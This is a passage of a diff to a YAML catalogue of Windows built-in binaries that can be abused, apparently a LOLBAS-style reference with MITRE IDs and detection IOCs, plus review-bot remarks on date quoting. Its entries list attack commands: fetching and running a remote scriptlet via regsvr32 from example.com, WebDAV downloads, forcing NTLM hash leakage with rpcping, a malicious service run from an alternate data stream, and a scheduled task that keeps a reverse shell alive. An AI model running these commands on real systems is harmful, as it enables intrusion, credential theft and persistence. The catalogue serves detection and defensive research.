|
||||||
Usecase: Execute code and bypass Application whitelisting
|
Usecase: Execute code and bypass Application whitelisting
|
||||||
Category: AWL bypass
|
Category: AWL bypass
|
||||||
@ -12,7 +12,7 @@ Commands:
|
|||||||
MitreID: T1121
|
MitreID: T1121
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: regasm.exe /U AllTheThingsx64.dll
|
- Command: regasm.exe /U AllTheThingsx64.dll
|
||||||
Description: Loads the target .DLL file and executes the UnRegisterClass function.
|
Description: Loads the target .DLL file and executes the UnRegisterClass function.
|
||||||
Usecase: Execute code and bypass Application whitelisting
|
Usecase: Execute code and bypass Application whitelisting
|
||||||
Category: Execute
|
Category: Execute
|
||||||
@ -25,7 +25,7 @@ Full_Path:
|
|||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: regasm.exe executing dll file
|
- IOC: regasm.exe executing dll file
|
||||||
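Review bot: The `Created` value on the new side of this hunk is left as a bare `2018-05-25` (assuming, from the print order, that the quoted form is the old line), and a YAML 1.1 loader such as PyYAML reads an unquoted ISO date as a date object rather than a string, so any consumer that sorts, compares or concatenates it as text changes behaviour after this commit. The yamllint default ruleset accepts both forms, so nothing in the new lint job will catch a loader that starts receiving date objects; keeping `Created: '2018-05-25'` is the safer form unless the consuming code is known to expect a date type. The same unquoting appears in the Regedit, Regini, Register-cimprovider, Regsvcs, Regsvr32, Replace, Rpcping, Rundll32, Runonce, Runscripthelper, Sc and Schtasks sections below. The file's first line (`---`) is outside this hunk.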
|
@ -2,7 +2,7 @@
|
|||||||
Name: Regedit.exe
|
Name: Regedit.exe
|
||||||
Description: Used by Windows to manipulate registry
|
Description: Used by Windows to manipulate registry
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
|
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
|
||||||
Description: Export the target Registry key to the specified .REG file.
|
Description: Export the target Registry key to the specified .REG file.
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\regedit.exe
|
- Path: C:\Windows\System32\regedit.exe
|
||||||
- Path: C:\Windows\SysWOW64\regedit.exe
|
- Path: C:\Windows\SysWOW64\regedit.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: regedit.exe reading and writing to alternate data stream
|
- IOC: regedit.exe reading and writing to alternate data stream
|
||||||
@ -33,4 +33,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Regini.exe
|
Name: Regini.exe
|
||||||
Description: Used to manipulate the registry
|
Description: Used to manipulate the registry
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2020-07-03'
|
Created: 2020-07-03
|
||||||
Commands:
|
Commands:
|
||||||
- Command: regini.exe newfile.txt:hidden.ini
|
- Command: regini.exe newfile.txt:hidden.ini
|
||||||
Description: Write registry keys from data inside the Alternate data stream.
|
Description: Write registry keys from data inside the Alternate data stream.
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\regini.exe
|
- Path: C:\Windows\System32\regini.exe
|
||||||
- Path: C:\Windows\SysWOW64\regini.exe
|
- Path: C:\Windows\SysWOW64\regini.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: regini.exe reading from ADS
|
- IOC: regini.exe reading from ADS
|
||||||
@ -24,4 +24,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Eli Salem
|
- Person: Eli Salem
|
||||||
Handle: '@elisalem9'
|
Handle: '@elisalem9'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Register-cimprovider.exe
|
Name: Register-cimprovider.exe
|
||||||
Description: Used to register new wmi providers
|
Description: Used to register new wmi providers
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Register-cimprovider -path "C:\folder\evil.dll"
|
- Command: Register-cimprovider -path "C:\folder\evil.dll"
|
||||||
Description: Load the target .DLL.
|
Description: Load the target .DLL.
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Register-cimprovider.exe
|
- Path: C:\Windows\System32\Register-cimprovider.exe
|
||||||
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe
|
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
@ -24,4 +24,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Philip Tsukerman
|
- Person: Philip Tsukerman
|
||||||
Handle: '@PhilipTsukerman'
|
Handle: '@PhilipTsukerman'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Regsvcs.exe
|
Name: Regsvcs.exe
|
||||||
Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
|
Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: regsvcs.exe AllTheThingsx64.dll
|
- Command: regsvcs.exe AllTheThingsx64.dll
|
||||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\regsvcs.exe
|
- Path: C:\Windows\System32\regsvcs.exe
|
||||||
- Path: C:\Windows\SysWOW64\regsvcs.exe
|
- Path: C:\Windows\SysWOW64\regsvcs.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Regsvr32.exe
|
Name: Regsvr32.exe
|
||||||
Description: Used by Windows to register dlls
|
Description: Used by Windows to register dlls
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||||
Description: Execute the specified remote .SCT script with scrobj.dll.
|
Description: Execute the specified remote .SCT script with scrobj.dll.
|
||||||
@ -39,7 +39,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\regsvr32.exe
|
- Path: C:\Windows\System32\regsvr32.exe
|
||||||
- Path: C:\Windows\SysWOW64\regsvr32.exe
|
- Path: C:\Windows\SysWOW64\regsvr32.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: regsvr32.exe getting files from Internet
|
- IOC: regsvr32.exe getting files from Internet
|
||||||
@ -51,4 +51,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
---
|
---
|
||||||
|
@ -1,12 +1,12 @@
|
|||||||
---
|
---
|
||||||
Name: Replace.exe
|
Name: Replace.exe
|
||||||
Description: Used to replace file with another file
|
Description: Used to replace file with another file
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: replace.exe C:\Source\File.cab C:\Destination /A
|
- Command: replace.exe C:\Source\File.cab C:\Destination /A
|
||||||
Description: Copy file.cab to destination
|
Description: Copy file.cab to destination
|
||||||
Usecase: Copy files
|
Usecase: Copy files
|
||||||
Category: Copy
|
Category: Copy
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
@ -14,7 +14,7 @@ Commands:
|
|||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
|
- Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
|
||||||
Description: Download/Copy bar.exe to outdir
|
Description: Download/Copy bar.exe to outdir
|
||||||
Usecase: Download file
|
Usecase: Download file
|
||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\replace.exe
|
- Path: C:\Windows\System32\replace.exe
|
||||||
- Path: C:\Windows\SysWOW64\replace.exe
|
- Path: C:\Windows\SysWOW64\replace.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Replace.exe getting files from remote server
|
- IOC: Replace.exe getting files from remote server
|
||||||
@ -33,4 +33,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: elceef
|
- Person: elceef
|
||||||
Handle: '@elceef'
|
Handle: '@elceef'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Rpcping.exe
|
Name: Rpcping.exe
|
||||||
Description: Used to verify rpc connection
|
Description: Used to verify rpc connection
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
|
- Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
|
||||||
Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
|
Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\rpcping.exe
|
- Path: C:\Windows\System32\rpcping.exe
|
||||||
- Path: C:\Windows\SysWOW64\rpcping.exe
|
- Path: C:\Windows\SysWOW64\rpcping.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Rundll32.exe
|
Name: Rundll32.exe
|
||||||
Description: Used by Windows to execute dll files
|
Description: Used by Windows to execute dll files
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: rundll32.exe AllTheThingsx64,EntryPoint
|
- Command: rundll32.exe AllTheThingsx64,EntryPoint
|
||||||
Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
|
Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
|
||||||
@ -65,13 +65,13 @@ Commands:
|
|||||||
Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
|
Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID:
|
MitreID:
|
||||||
MitreLink:
|
MitreLink:
|
||||||
OperatingSystem: Windows 10 (and likely previous versions)
|
OperatingSystem: Windows 10 (and likely previous versions)
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\rundll32.exe
|
- Path: C:\Windows\System32\rundll32.exe
|
||||||
- Path: C:\Windows\SysWOW64\rundll32.exe
|
- Path: C:\Windows\SysWOW64\rundll32.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
Name: Runonce.exe
|
Name: Runonce.exe
|
||||||
Description:
|
Description:
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Runonce.exe /AlternateShellStartup
|
- Command: Runonce.exe /AlternateShellStartup
|
||||||
Description: Executes a Run Once Task that has been configured in the registry
|
Description: Executes a Run Once Task that has been configured in the registry
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\runonce.exe
|
- Path: C:\Windows\System32\runonce.exe
|
||||||
- Path: C:\Windows\SysWOW64\runonce.exe
|
- Path: C:\Windows\SysWOW64\runonce.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY
|
- IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY
|
||||||
@ -25,4 +25,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Pierre-Alexandre Braeken
|
- Person: Pierre-Alexandre Braeken
|
||||||
Handle: '@pabraeken'
|
Handle: '@pabraeken'
|
||||||
---
|
---
|
||||||
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
Name: Runscripthelper.exe
|
Name: Runscripthelper.exe
|
||||||
Description:
|
Description:
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
|
- Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
|
||||||
Description: Execute the PowerShell script named test.txt
|
Description: Execute the PowerShell script named test.txt
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
|
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
|
||||||
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
|
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Event 4014 - Powershell logging
|
- IOC: Event 4014 - Powershell logging
|
||||||
@ -25,4 +25,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Matt Graeber
|
- Person: Matt Graeber
|
||||||
Handle: '@mattifestation'
|
Handle: '@mattifestation'
|
||||||
---
|
---
|
||||||
|
@ -2,12 +2,12 @@
|
|||||||
Name: Sc.exe
|
Name: Sc.exe
|
||||||
Description: Used by Windows to manage services
|
Description: Used by Windows to manage services
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
|
- Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
|
||||||
Description: Creates a new service and executes the file stored in the ADS.
|
Description: Creates a new service and executes the file stored in the ADS.
|
||||||
Usecase: Execute binary file hidden inside an alternate data stream
|
Usecase: Execute binary file hidden inside an alternate data stream
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1096
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\sc.exe
|
- Path: C:\Windows\System32\sc.exe
|
||||||
- Path: C:\Windows\SysWOW64\sc.exe
|
- Path: C:\Windows\SysWOW64\sc.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Services that gets created
|
- IOC: Services that gets created
|
||||||
@ -24,4 +24,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
@ -2,12 +2,12 @@
|
|||||||
Name: Schtasks.exe
|
Name: Schtasks.exe
|
||||||
Description: Schedule periodic tasks
|
Description: Schedule periodic tasks
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
|
- Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
|
||||||
Description: Create a recurring task to execute every minute.
|
Description: Create a recurring task to execute every minute.
|
||||||
Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
|
Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1053
|
MitreID: T1053
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1053
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1053
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\schtasks.exe
|
- Path: c:\windows\system32\schtasks.exe
|
||||||
- Path: c:\windows\syswow64\schtasks.exe
|
- Path: c:\windows\syswow64\schtasks.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Services that gets created
|
- IOC: Services that gets created
|
||||||
@ -24,4 +24,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person:
|
- Person:
|
||||||
Handle:
|
Handle:
|
||||||
---
|
---
|
||||||
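Review bot: The `- IOC: Services that gets created` line under Schtasks.exe repeats the Sc.exe entry word for word and does not describe an indicator for scheduled-task creation, so a defender consuming this file gets a misleading detection hint; something like `- IOC: Scheduled tasks that get created` would match the technique the command describes. The trailing `- Person:` / `Handle:` pair carries no values and is loaded as `null` rather than an empty string, which yamllint's default rules (empty-values is off) will not report; either drop the stanza or write `''` explicitly. The Rundll32 section's empty `MitreID:` and `MitreLink:` lines have the same null-vs-string ambiguity.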
|